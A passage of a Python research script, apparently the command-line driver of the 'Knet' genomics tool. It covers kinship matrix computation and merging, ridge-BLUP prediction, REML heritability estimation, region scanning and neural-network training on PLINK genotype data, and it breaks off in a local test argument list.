AFTER squaring it??\n # or that would blow things out of proportion??\n \n \n \n\ndef runkinmerge(args) :\n set_Threads(args)\n set_nixMem(args) \n print('Knet merging Kinships started') \n \n from com.application.logic.reml import kinship\n \n allKinLocations = knet_IO.loadKinshipLocations(args.allkins)\n \n # need to know the number of SNPs that were used for each kinship, so we can weight them according to the total\n kinshipSNPs = list()\n for i in range(len(allKinLocations)) :\n kinshipSNPs.append( knet_IO.load_N_fromGCTA_GRM( allKinLocations[i] ) )\n gc.collect()\n \n totalSNPs = np.sum(kinshipSNPs)\n kinship_total = None\n IDs = None\n print('will load', str(len(allKinLocations)) , \" kinship matrices, with a total of \",str( int(totalSNPs) ), \" SNPs\", flush=True )\n \n for i in range(len(allKinLocations)) :\n K_new = knet_IO.loadGCTA_GRM(allKinLocations[i])\n K = K_new[\"K\"] \n currentSNPs = K_new[\"N\"][0]\n IDs = K_new[\"ids\"]\n weight = currentSNPs/totalSNPs\n del K_new; gc.collect()\n if kinship_total is None : # if this is the first kiship we have loaded\n kinship_total = K * weight\n else :\n kinship_total = kinship_total + K * weight\n \n\n del K; gc.collect()\n print(\"merged kinship\", (i+1) , \" out of:\", len(allKinLocations), \"weighed at:\", weight, flush=True )\n \n knet_IO.writeGCTA_GRM(args.out,kinship_total, IDs, totalSNPs)\n # K_totalLoaded = loadGCTA_GRM('../../../0cluster/results/broadsenseh2/kinship_total')[\"K\"]\n\ndef runcalckins(args) :\n set_Threads(args)\n set_nixMem(args) \n print('Knet calculating Kinship started') \n \n\n from com.application.logic.reml import kinship\n from com.application.utils import geno_qc\n \n # load data\n genotypeData = knet_IO.loadPLINK(args.bfile, loadPhenos = False) \n M = genotypeData[\"M\"]\n irsIds = genotypeData[\"rsid\"] \n IDs = genotypeData[\"IDs\"] \n del genotypeData ; gc.collect() # dont need this\n \n # QC data\n qc_data = geno_qc.genoQC_all(M, rsIds = irsIds)\n M = qc_data[\"X\"]\n rsIds_qc = qc_data[\"rsIds\"] # will need these, as after removing some SNPs, I cannot just appyl the LDAK weights, but will need to match them up....\n indicesToRemove = qc_data[\"indicesToRemove\"] # i might actually be able to get away by using this o nthe LDAK weights\n MAFs =qc_data[\"MAFs\"] # in case this will be needed to apply a score based on it\n del qc_data; del irsIds; gc.collect()\n \n \n # load weights if any\n weights = None\n if args.MAFS : # if MAF Score weights are requested\n print(\"computing MAF scores\", flush=True)\n weights = geno_qc.computeMAFScore(MAFs, args.MAFS)\n \n if args.weights : # load LDAK weights\n LDAK_weights = knet_IO.loadLDAKWeights(args.weights)\n gc.collect()\n print(\"Loaded number of LDAK Weights: \", len(LDAK_weights), flush=True)\n LDAK_weights = np.delete(LDAK_weights, indicesToRemove) # delete any SNPs that were removed the internal QC process \n print(\"After deleting QCd SNPs(\",len(indicesToRemove),\") remeining weights: \", len(LDAK_weights), flush=True)\n if weights is not None: # if we requested MAF Scores as wegihts then the total weights will be their product\n weights = weights * LDAK_weights\n else : weights = LDAK_weights # otherwise just use the LDAK weights\n \n # the LDAK weights set some SNPs to 0, this will then cause zscore to fail ( dividing by std dev 0)\n # solution: remove all 0 values from both the weights as well as from the M design matrix\n nonZeroWeightsIndices = np.nonzero(weights)[0] # get all nonzero weight's indices\n M = np.take(M, nonZeroWeightsIndices, axis=1) # only keep these for M\n weights = np.take(weights, nonZeroWeightsIndices) # as well as for the weights\n \n if weights is not None : weights = np.diag(weights) # turn it into a diagonal matrix\n \n numSNPs = M.shape[1]\n \n # if a dominance kinship was requested\n if args.dominance :\n print(\"computing dominance kinship\", flush=True)\n # get dominance kinship\n K_dominance = kinship.calc_Kinship_Dominance(M, weights) ## apply weightsfor LD / MAFS (if any)\n gc.collect()\n # write it to disk then dispose\n knet_IO.writeGCTA_GRM(args.out + \"_dom\",K_dominance, IDs, numSNPs)\n del K_dominance; gc.collect()\n \n # Additive Kinship\n print(\"computing additive kinship\", flush=True)\n if weights is not None: M = M.dot(weights)\n M = geno_qc.standardise_Genotypes(M)\n K_additive = kinship.calc_Kinship(M)\n knet_IO.writeGCTA_GRM(args.out + \"_add\",K_additive, IDs, numSNPs)\n \n# \n# \n# part = M.shape[1] / 4\n# part1 = int( (part *2) )\n# part2 = part1 + int( (part) )\n# part3 = M.shape[1]\n#\n# M1 = M[:,0:part1]\n# M2 = M[:,part1:part2]\n# M3 = M[:,part2:part3]\n# M1.shape[1] + M2.shape[1] + M3.shape[1]\n# \n# \n# K_additive = calc_Kinship(M1)\n# knet_IO.writeGCTA_GRM(args.out + \"_part1\",K_additive, IDs, M1.shape[1])\n# \n# K_additive = calc_Kinship(M2)\n# knet_IO.writeGCTA_GRM(args.out + \"_part2\",K_additive, IDs, M2.shape[1])\n# \n# K_additive = calc_Kinship(M3)\n# knet_IO.writeGCTA_GRM(args.out + \"_part3\",K_additive, IDs, M3.shape[1])\n# \n# \n# del K_additive; gc.collect()\n# \n# del M; del M1; del M2; del M3; del MAFs; del rsIds_qc;\n# gc.collect()\n#\n# K_additive_total = calc_Kinship(M)\n# knet_IO.writeGCTA_GRM(args.out + \"_total\",K_additive_total, IDs, M.shape[1])\n\n \n \ndef runrrblup_big(args) :\n set_Threads(args)\n set_nixMem(args) \n print('Knet RidgeRegression BLUP started') \n \n from com.application.logic.reml import reml\n from com.application.logic.reml import kinship\n from com.application.utils import geno_qc\n # load plink binary (or eigen summary) / phenotypes\n cc = True\n if args.cc == 0 : cc = False\n \n recodecc = True\n if args.recodecc == 0 : recodecc = False # IE if this is FALSE, then we will NOT recode \n \n # load training data\n y = knet_IO.loadPLINKPheno(args.pheno, caseControl = cc, recodeCaseControl = recodecc) \n\n genotypeData = knet_IO.loadPLINK(args.bfile, loadPhenos = False) \n M = genotypeData[\"M\"]\n irsIds = genotypeData[\"rsid\"]\n del genotypeData ; gc.collect() # dont need this\n \n qc_data = geno_qc.genoQC_all(M, rsIds = irsIds)\n M = qc_data[\"X\"]\n rsIds_qc = qc_data[\"rsIds\"] # save away the surviving SNP list that we have used \n indicesToRemove = qc_data[\"indicesToRemove\"]\n del qc_data; gc.collect()\n M = geno_qc.standardise_Genotypes(M) # overwrite M dont store it 2x\n gc.collect()\n \n # get SNP coefs\n results = reml.computeBLUPs_RidgeBLUP(y, M, args.delta)\n Beta = results.BETA\n del M; del results; gc.collect()\n print(\"computed Ridge Coefs\")\n # load validation sets\n #y_validation = knet_IO.loadPLINKPheno(args.validPhen, caseControl = cc, recodeCaseControl = recodecc) \n \n genotypeData = knet_IO.loadPLINK(args.validSet, loadPhenos = False) \n M_validation = genotypeData[\"M\"] \n del genotypeData ; gc.collect() # dont need this\n qc_data = geno_qc.removeList(M_validation, indicesToRemove)\n M_validation = qc_data[\"X\"] \n del qc_data; gc.collect() \n M_validation= geno_qc.standardise_Genotypes(M_validation) \n gc.collect() \n print(\"After standardising, validation data in MBs is: \",geno_qc.getSizeInMBs(M_validation) )\n\n\n\n # make predictions\n yhat = reml.predictYhat(M_validation, Beta)\n # this is a 1D array, not 2D\n \n fileName = args.out + \"yhat.txt\"\n with open(fileName, \"w\") as file:\n file.write(\"Profile\" + \"\\n\")\n for i in range( len(yhat) ) :\n line = str(yhat[i] )\n\n \n file.write( line + \"\\n\") # file.write( ( str(yhat[i])[2:-1] ).replace(\" \", \" \").replace(\" \", \"\\t\") + \"\\n\")\n\n## same a sother but it uses the Ridge formula of XXt, IE will use much less memory\ndef runrrblup(args) :\n print(\"runrrblup\", flush=True)\n set_Threads(args)\n set_nixMem(args) \n print('Knet RidgeRegression BLUP started', flush=True) \n \n from com.application.logic.reml import reml\n from com.application.logic.reml import kinship\n from com.application.utils import geno_qc\n # load plink binary (or eigen summary) / phenotypes\n cc = True\n if args.cc == 0 : cc = False\n \n recodecc = True\n if args.recodecc == 0 : recodecc = False # IE if this is FALSE, then we will NOT recode \n # load training data\n y = knet_IO.loadPLINKPheno(args.pheno, caseControl = cc, recodeCaseControl = recodecc) \n genotypeData = knet_IO.loadPLINK(args.bfile, loadPhenos = False) \n M = genotypeData[\"M\"]\n irsIds = genotypeData[\"rsid\"]\n del genotypeData ; gc.collect() # dont need this\n qc_data = geno_qc.genoQC_all(M, rsIds = irsIds)\n M = qc_data[\"X\"]\n rsIds_qc = qc_data[\"rsIds\"] # save away the surviving SNP list that we have used \n indicesToRemove = qc_data[\"indicesToRemove\"]\n del qc_data; gc.collect()\n M = geno_qc.standardise_Genotypes(M) # overwrite M dont store it 2x\n gc.collect()\n \n # get SNP coefs\n g = reml.computeBLUPs_RidgeBLUP_morep(y, M, args.delta)\n Beta = reml.backCalculate_Beta_BLUP(g,M) \n del M; gc.collect()\n print(\"computed Ridge Coefs\", flush=True)\n # load validation sets\n #y_validation = knet_IO.loadPLINKPheno(args.validPhen, caseControl = cc, recodeCaseControl = recodecc) \n \n genotypeData = knet_IO.loadPLINK(args.validSet, loadPhenos = False) \n M_validation = genotypeData[\"M\"] \n del genotypeData ; gc.collect() # dont need this\n qc_data = geno_qc.removeList(M_validation, indicesToRemove)\n M_validation = qc_data[\"X\"] \n del qc_data; gc.collect() \n M_validation= geno_qc.standardise_Genotypes(M_validation) \n gc.collect() \n print(\"After standardising, validation data in MBs is: \",geno_qc.getSizeInMBs(M_validation) , flush=True)\n\n #fileName = args.out + \"beta.txt\"\n #with open(fileName, \"w\") as file:\n # file.write(\"Beta\" + \"\\n\")\n # for i in range( len(Beta) ) :\n # line = str(Beta[i] ) \n # file.write( line + \"\\n\") \n\n\n indicesToRemove = list()\n for i in range( M_validation.shape[1] ) :\n if np.isnan(M_validation[:,i]).any() :\n print(\"!!!Validation set has NaNs at column:\" + str(i), flush=True)\n indicesToRemove.append(i) \n \n # need to remove any NaNs from both the genotype matrix and its corresponding Beta\n print(\"num SNPs BEFORE removing: \", Beta.shape[0] )\n M_validation = np.delete(M_validation, indicesToRemove, axis=1)\n Beta = np.delete(Beta, indicesToRemove, axis=0)\n print(\"num SNPs AFTER removing: \", Beta.shape[0] )\n \n \n \n # make predictions\n yhat = reml.predictYhat(M_validation, Beta)\n\n # this is a 1D array, not 2D\n \n fileName = args.out + \"yhat.txt\"\n with open(fileName, \"w\") as file:\n file.write(\"Profile\" + \"\\n\")\n for i in range( len(yhat) ) :\n line = str(yhat[i] ) \n file.write( line + \"\\n\") \n \n \ndef runh2(args) :\n set_Threads(args)\n set_nixMem(args) \n print('Knet H2 analyis started') \n if args.eig is None and args.bfile is None and args.K is None:\n print(\"either an eigen decomposition or a PLINK binary or a Kinship matrix is requried\")\n\n else :\n from com.application.logic.reml import reml\n from com.application.logic.reml import kinship\n from com.application.utils import geno_qc\n # load plink binary (or eigen summary) / phenotypes\n cc = True\n if args.cc == 0 : cc = False\n \n recodecc = True\n if args.recodecc == 0 : recodecc = False # IE if this is FALSE, then we will NOT recode \n \n y = knet_IO.loadPLINKPheno(args.pheno, caseControl = cc, recodeCaseControl = recodecc) \n y = geno_qc.standardise_Genotypes(y)\n \n if args.eig is None and args.K is None : # if an eigen summary wasn't supplied, IE we don't have it\n print(\"calculating REML from sratch, no Eigen summary was supplied\")\n genotypeData = knet_IO.loadPLINK(args.bfile, loadPhenos = False) \n M = genotypeData[\"M\"]\n\n qc_data = geno_qc.genoQC_all(M, rsIds = genotypeData[\"rsid\"])\n M = qc_data[\"X\"]\n gc.collect()\n M = geno_qc.standardise_Genotypes(M) # overwrite M dont store it 2x\n gc.collect()\n K = kinship.calc_Kinship( M ) # 3. create kinship matrix from block \n del M ; gc.collect() # delete M as we no longer need it \n results = reml.REML_GWAS(y, K) # 4. check if there is any h2 in this block via EMMA\n del K ; gc.collect()\n \n elif args.K : # if a kinship matrix was supplied\n print(\"calculating REML from Kinship matrix supplied\")\n K_new = knet_IO.loadGCTA_GRM(args.K)\n K = K_new[\"K\"] \n del K_new; gc.collect()\n \n results = reml.REML_GWAS(y, K) # 4. check if there is any h2 in this block via EMMA\n \n else :\n print(\"loading saved eigen sums from: \" + args.eig)\n loadedEigSum = knet_IO.loadEigenSum(args.eig)[0] # load eigen decomposition\n results = reml.REML_GWAS(y, eigenSummary = loadedEigSum) # 4. check if there is any h2 in this block via EMMA\n\n\n \n eigSum = results[\"eigSum\"] # just resave the one we have got \n h2 = results[\"vg\"] / ( results[\"vg\"] + results[\"ve\"])\n h2_SE = reml.h2_SE_approx2(y, eigSum.values)\n\n print(\"h2: \" , h2 , \" / h2 SE: \", h2_SE, \" / delta: \", results[\"delta\"])\n fileName = args.out + \"reml.txt\"\n with open(fileName, \"w\") as file:\n file.write(\"h2=\" + str(h2) + \"\\n\")\n file.write(\"h2_SE=\" + str(h2_SE) + \"\\n\")\n file.write(\"delta=\" + str(results[\"delta\"]) + \"\\n\")\n file.write(\"ve=\" + str(results[\"ve\"]) + \"\\n\")\n file.write(\"vg=\" + str(results[\"vg\"]) + \"\\n\")\n file.write(\"REML_LL=\" + str(results[\"REML\"]) + \"\\n\")\n \n # now write out the eigen summaries too ( but only if it wasn't supplied in the first place)\n if args.eig is None : knet_IO.writeEigenSum(args.out, [eigSum ] ) # the below function expects a list\n\n\ndef runKnet(args) :\n set_Threads(args)\n set_nixMem(args) \n print('Knet Neural net started')\n\n # load regions\n regions = None\n amblup_regions = None # this has a different structure\n if args.regions :\n regions = knet_IO.loadRegionData(args.regions) # load regions#\n \n elif args.amblupregions and args.amblupreml :\n print('loading AMLBUP regions')\n\n remlData = knet_IO.loadLDAKRegionsDeltas(args.amblupreml)\n regionData = knet_IO.loadLDAKRegions(args.amblupregions)\n amblup_regions = {\"REGIONS\":regionData, \"DELTAS\":remlData, \"CONV\":args.conv }\n\n priors = None\n if args.priors :\n priors = knet_IO.loadSummaryStats(args.priors) # load 'priors'\n \n\n \n # check if we need to load saved state weights\n loadedWeightsData = None\n \n if args.loadWeights :\n\n loadedWeightsData =list()\n moreFiles = True\n counter = 0\n \n while moreFiles : # keep going until we run out of files to load\n # currentLocation = args.loadWeights + str(counter) # files are expected to be named as regions1.txt, regions2.txt, etc\n my_file = Path(args.loadWeights + \"_\"+ str(counter) +\"_0.bin\") # check if the main weights file exists\n \n if my_file.is_file(): # check if it exists\n loadedWeightsData.append(list())\n \n for j in range(4) : # there are 4 filtes, 1 for each, W, W bias, momentum and Momentub bias\n loadedWeightsData[counter].append( knet_IO.loadMatrixFromDisk(args.loadWeights + \"_\"+ str(counter) + \"_\" + str(j)) )\n # each weight is a matrix ( even the biases), and they are coded as name_LAYER_W/Bias/Momentum/Momentum_bias (so chrom_0_0 is layer 1's Weights_W)\n counter = counter +1\n else : moreFiles = False\n \n \n \n # pass this into knet manager, along with all the conditional params\n knet_results = knet_manager.runKnet(args, args.epochs, args.learnRate, args.momentum, regions, args.evalFreq, args.savFreq, args.predictPheno, loadedWeightsData, args.saveWeights, args.randomSeed, args.hidCount, args.hidl2, args.hidAct, amblup_regions, priors)\n gc.collect() \n\n\n \n # write epoch results out\n results_its = knet_results[\"results\"][\"results\"] \n fileName = args.out + \"nn_results.txt\"\n with open(fileName, \"w\") as file: \n \n line = \"epochs\"\n if \"train_accuracy\" in results_its: line = line + \"\\t\" + \"train_accuracy\"\n if \"test_accuracy\" in results_its: line = line + \"\\t\" + \"test_accuracy\"\n file.write(line + \"\\n\")\n \n for i in range( len(results_its[\"epochs\"]) ):\n line = str(results_its[\"epochs\"][i]) \n if \"train_accuracy\" in results_its: line = line + \"\\t\" + str(results_its[\"train_accuracy\"][i])\n if \"test_accuracy\" in results_its: line = line + \"\\t\" + str(results_its[\"test_accuracy\"][i])\n file.write(line + \"\\n\") \n \n \n # generate plot of the results\n if len(results_its[\"epochs\"]) > 0 :\n plotgen.exportNNPlot(results_its, args.out + \"nnplot\")\n \n \n # write out the SNPs that were used for the analysis\n rsIds = knet_results[\"rsIds\"]\n fileName = args.out + \"nn_SNPs.txt\"\n with open(fileName, \"w\") as file: \n for i in range( len(rsIds) ):\n file.write(rsIds[i] + \"\\n\")\n \n\n\n # write final predictions out ( if this was requested)\n yhat = knet_results[\"yhat\"]\n \n # recode yhat into single col: I think this is a bad idea as this will basically threshold everyone to be all 1s\n outputShape = 1\n if len(yhat.shape) > 1 : outputShape = yhat.shape[1]\n # if outputShape > 1 : yhat = knet_IO.recodeOneHotCaseControl(yhat)\n \n if yhat is not None : \n fileName = args.out + \"yhat.txt\"\n with open(fileName, \"w\") as file:\n file.write(\"Profile\" + \"\\n\")\n for i in range(yhat.shape[0]) :\n line = str(yhat[i][0] )\n for j in range(1, len(yhat[i]) ):\n line = line + \"\\t\" + str(yhat[i][j] )\n \n file.write( line + \"\\n\") # file.write( ( str(yhat[i])[2:-1] ).replace(\" \", \" \").replace(\" \", \"\\t\") + \"\\n\")\n\n \n \n \n \n \n # write final weights out\n # results[\"weights\"]\n weights_nn = None\n if knet_results[\"weights\"] is not None:\n weights_nn = knet_results[\"weights\"]\n for i in range(len(weights_nn)) :\n for j in range(len(weights_nn[i])) :\n knet_IO.writeMatrixToDisk( args.saveWeights + \"_\" + str(i)+ \"_\" + str(j) , weights_nn[i][j])\n # each weight is a matrix ( even the biases), and they are coded as name_LAYER_W/Bias/Momentum/Momentum_bias (so chrom_0_0 is layer 1's Weights_W)\n \n \n\n \ndef runScanner(args) : \n set_nixMem(args) \n set_Threads(args)\n print(\"Knet scanner started\")\n\n # check if we want to load the eigen decomposition summaries for each region or not\n # loadedEigSum = None\n # if args.loadEigSum is not None :\n # print(\"loading saved eigen sums from: \" + args.loadEigSum)\n # loadedEigSum = knet_IO.loadEigenSum(args.loadEigSum)\n \n cc = True\n if args.cc == 0 : cc = False\n \n recodecc = True\n if args.recodecc == 0 : recodecc = False\n\n # load plink binary / phenotypes\n genotypeData = knet_IO.loadPLINK(args.scanner, loadPhenos = False) \n M = genotypeData[\"M\"]\n y = knet_IO.loadPLINKPheno(args.pheno, caseControl = cc, recodeCaseControl = recodecc) \n \n # obtain regions\n regionResults = scanner.findRegions(y, M, irsIds = genotypeData[\"rsid\"], blockSize = args.filterSize, stride = args.stride, X = None)\n\n # check if we want to save the eigen decomposition summaries for each region or not\n # if args.saveEigSum is not None:\n # print(\"saving eigen decompositions to: \" + args.saveEigSum)\n # knet_IO.writeEigenSum(args.saveEigSum, regionResults[\"eigSum\"] )\n \n # write regions onto disk\n knet_IO.writeRegionData(args.out,regionResults[\"REGIONS\"], regionResults[\"DELTAS\"])\n print(\"written regions to: \" + args.out)\n \n \n # write out the SNPs that were used for the analysis\n rsIds = regionResults[\"rsIds\"]\n fileName = args.out + \"_SNPs.txt\"\n with open(fileName, \"w\") as file: \n for i in range( len(rsIds) ):\n file.write(rsIds[i] + \"\\n\")\n \n\n \n \ndef runMerge(args) : \n set_nixMem(args) \n set_Threads(args)\n print('Knet merging started, from: ' + args.merge + \" to: \" + args.out)\n # check for other required arguments\n\n location = args.merge\n outLocation = args.out\n \n moreFiles = True\n counter = 1\n allRegions = list()\n while moreFiles : # keep going until we run out of files to load\n currentLocation = location + str(counter) + \".txt\" # files are expected to be named as regions1.txt, regions2.txt, etc\n my_file = Path(currentLocation)\n\n if my_file.is_file(): # check if it exists\n allRegions.append( knet_IO.loadRegionData(currentLocation) ) # load regions\n else : moreFiles = False\n counter = counter +1\n \n # concat them into a single list\n results = scanner.concatRegions(allRegions)\n \n # write these onto disk\n knet_IO.writeRegionData(outLocation,results[\"REGIONS\"], results[\"DELTAS\"] )\n\n\n##################################################################################################\n# setup COmmand line parser\n##################################################################################################\n\nparser = argparse.ArgumentParser()\n\n\n\n# overall\nparser.add_argument(\"--out\",required=True, help='an output location is always required')\nparser.add_argument(\"--threads\",required=False, help='set number of threads used by multithreaded operations')\nparser.add_argument(\"--nixMem\",required=False, type=int, help='Memory limit for *nix based systems in Megabytes')\n\n\nsubparsers = parser.add_subparsers()\nsubparsers.required = True\nsubparsers.dest = 'either knet, scanner, h2, kinship, kinmerge or merge' # hack to make subparser required\n\n# create the parser for the \"a\" command\nparser_knet = subparsers.add_parser('knet')\nparser_knet.add_argument('--knet', required=True) # the location of the train set binaries\nparser_knet.add_argument(\"--pheno\", required=True)\nparser_knet.set_defaults(func=runKnet)\n\n# knet subparams\nparser_knet.add_argument(\"--regions\", required=False) # ,required=False \nparser_knet.add_argument(\"--loadWeights\") # from where we want to load the weights\nparser_knet.add_argument(\"--saveWeights\") # where we wnt to save weights\nparser_knet.add_argument(\"--savFreq\", default=-1, type=int) # how frequently we make backups of Weights\nparser_knet.add_argument(\"--epochs\", default=100, type=int) # how many epochs\nparser_knet.add_argument(\"--learnRate\", default=0.005, type=float) \nparser_knet.add_argument(\"--momentum\", default=-1, type=float) # -1 means 'disabled'\nparser_knet.add_argument(\"--validSet\") # the location for the binaries for the validation set\nparser_knet.add_argument(\"--validPhen\") # the location for the binaries for the validation set phenotypes\nparser_knet.add_argument(\"--evalFreq\", default=10, type=int) # how frequently we evaluate prediction accuracy (-1 for disabled) \nparser_knet.add_argument(\"--cc\", type=int) # ,required=False # if phenotype is case control\nparser_knet.add_argument(\"--recodecc\", type=int) # ,required=False # if we want to recode case control to quantitative\nparser_knet.add_argument(\"--randomSeed\", default=1, type=int) \nparser_knet.add_argument(\"--hidCount\", default=0, type=int) # number of hidden layers\nparser_knet.add_argument(\"--hidl2\", default=0.0, type=float) # the L2 regularizer shrinkage param \nparser_knet.add_argument(\"--hidAct\", default=0, type=int) # the hidden layer activations ( 0 = softplus, 1 = sigmoid, 2 = leaky RELU, 3 = linear)\nparser_knet.add_argument(\"--amblupregions\") # amblup regions directory, this contains the number of regions and the SNPs in each region\nparser_knet.add_argument(\"--amblupreml\") # amblup reml file location, this contains the regional heritabilities \nparser_knet.add_argument(\"--conv\", default=0, type=int) # if we should use locally connected / convolutional topology whn using amblup\nparser_knet.add_argument(\"--priors\") # from where we want to load the SNP 'priors'\n \n# parser_knet.add_argument(\"--topology\", required=True) # the location of the file that describes the network's topology (IE number and size of layers etc)\nparser_knet.add_argument(\"--predictPheno\", default=-1, type=int) # if network should save phenotype predictions to a location at the end, for a validation set \n \n \nparser_scanner = subparsers.add_parser('scanner')\nparser_scanner.add_argument('--scanner', required=True)\nparser_scanner.add_argument(\"--pheno\", required=True)\nparser_scanner.set_defaults(func=runScanner)\n\nparser_merge = subparsers.add_parser('merge')\nparser_merge.add_argument('--merge', required=True)\nparser_merge.set_defaults(func=runMerge)\n\n# narrow sense h2 analysis\nparser_h2 = subparsers.add_parser('h2')\nparser_h2.add_argument('--eig') # the location of the eigen decomposition\nparser_h2.add_argument('--bfile') # the location of the plink binaries \nparser_h2.add_argument('--K') # the location of the Kinship matrix \nparser_h2.add_argument(\"--pheno\", required=True)\nparser_h2.add_argument(\"--cc\", type=int) # ,required=False\nparser_h2.add_argument(\"--recodecc\", type=int) # ,required=False \nparser_h2.set_defaults(func=runh2)\n \n\n# Ridge-BLUP\nparser_rrblup = subparsers.add_parser('rrblup')\nparser_rrblup.add_argument('--bfile', required=True) # the location of the plink binaries \nparser_rrblup.add_argument(\"--delta\", required=True, type=float)\nparser_rrblup.add_argument(\"--pheno\", required=True)\nparser_rrblup.add_argument(\"--cc\", type=int) # ,required=False\nparser_rrblup.add_argument(\"--recodecc\", type=int) # ,required=False \nparser_rrblup.set_defaults(func=runrrblup)\nparser_rrblup.add_argument(\"--validSet\", required=True) # the location for the binaries for the validation set\n#parser_rrblup.add_argument(\"--validPhen\", required=True) # the location for the binaries for the validation set phenotypes\n\n \n# Kinship\nparser_kin = subparsers.add_parser('kinship')\nparser_kin.add_argument('--bfile', required=True) # the location of the plink binaries \nparser_kin.add_argument(\"--dominance\") # if we should compute dominance instead of the usual additive kinship\nparser_kin.add_argument('--weights') # weights used to scale the SNPs ( usually from LDAK)\nparser_kin.add_argument('--MAFS', type=float) # alpha: if Score based on MAF should be used (MAF(1-MAF))^(1-alpha) as per speed at al\nparser_kin.set_defaults(func=runcalckins)\n \n# Kinship merging\nparser_kinmerge = subparsers.add_parser('kinmerge')\nparser_kinmerge.add_argument('--allkins', required=True) # a text file that contains a list of kinship matrices to be merged, 1 per line without header (GCTA format)\nparser_kinmerge.set_defaults(func=runkinmerge)\n \n \n \n# Multi-HE\nparser_mhe = subparsers.add_parser('mhe')\nparser_mhe.add_argument('--addkin', required=True) # location of the additive kinship matrix\nparser_mhe.add_argument('--domkin') # location of the dominance kinship matrix\nparser_mhe.add_argument(\"--epi\", default=-1, type=int) # the level of epistasis (disabled if < 2)\nparser_mhe.add_argument(\"--pheno\", required=True)\nparser_mhe.add_argument(\"--cc\", type=int) # ,required=False\nparser_mhe.add_argument(\"--recodecc\", type=int) # ,required=False \nparser_mhe.add_argument(\"--res\", default=0, type=int) # if the MHER is running on original (0) or Residualised version (1)\nparser_mhe.set_defaults(func=runmhe)\n \n \n# recoding the PLINK binary int dominance contrasts \nparser_redom = subparsers.add_parser('redom')\nparser_redom.add_argument('--bfile', required=True) # the location of the plink binaries \nparser_redom.set_defaults(func=rundom)\n \n \n \n \n\n# scanner subparams\nparser_scanner.add_argument(\"--stride\", default=25, type=int) # ,required=False\nparser_scanner.add_argument(\"--filterSize\", default=50, type=int) # ,required=False\nparser_scanner.add_argument(\"--saveEigSum\") # ,required=False\nparser_scanner.add_argument(\"--loadEigSum\") # ,required=False\nparser_scanner.add_argument(\"--cc\", type=int) # ,required=False\nparser_scanner.add_argument(\"--recodecc\", type=int) # ,required=False \n \n# retreive command line arguments\nargs = parser.parse_args()\nargs.func(args)\n\n# toy test\n# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/toyregions_ --threads 2 scanner --scanner /nfs/users/nfs_m/mk23/data/gwas2/toy/wtccc2_hg19_toy --pheno /nfs/users/nfs_m/mk23/data/gwas2/toy/wtccc2_hg19_toy.pheno --saveEigSum /nfs/users/nfs_m/mk23/test/pytest/toyeig\n\n\n\n# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/22 --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22.pheno --saveEigSum /nfs/users/nfs_m/mk23/test/pytest/f1/22eig_\n#python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/22 --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22.pheno\n\n#python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/21 --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/21 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/21.pheno\n\n\n#python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/15 --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/15 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/15.pheno\n\n#python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/1 --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/1 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/1.pheno\n\n\n\n# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/15_s100_ --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/15 --filterSize 100 --stride 50 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/15.pheno\n\n\n# python knet.py --out /nfs/users/nfs_m/mk23/test/pytest/toyregions_ --threads 8 scanner --scanner /nfs/users/nfs_m/mk23/data/gwas2/toy/wtccc2_hg19_toy --pheno /nfs/users/nfs_m/mk23/data/gwas2/toy/wtccc2_hg19_toy.pheno --loadEigSum /nfs/users/nfs_m/mk23/test/pytest/toyeig\n\n\n# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/22_s100d_ --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22 --filterSize 100 --stride 50 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22.pheno\n\n# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/22_s100t_ --threads 2 scanner --scanner /nfs/users/nfs_m/mk23/test/pytest/f1/22_toy_long --filterSize 100 --stride 50 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22.pheno\n\n\n##################################################################################################\n##################################################################################################\n# Local Tests\n\n# SCANNER\nargs = parser.parse_args(['--out', '../../../0cluster/results/knettest/regions22_','scanner', '--scanner','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--stride', '50', '--filterSize', '100']) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n#args.func(args)\n\n# KNET MAIN\nargs = parser.parse_args(['--out', '../../../0cluster/results/knettest/chr22','knet', '--knet','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--regions', '../../../0cluster/results/knettest/regions22_', '--epochs', '10', '--learnRate', '0.00005', '--momentum', '0.9', '--validSet', 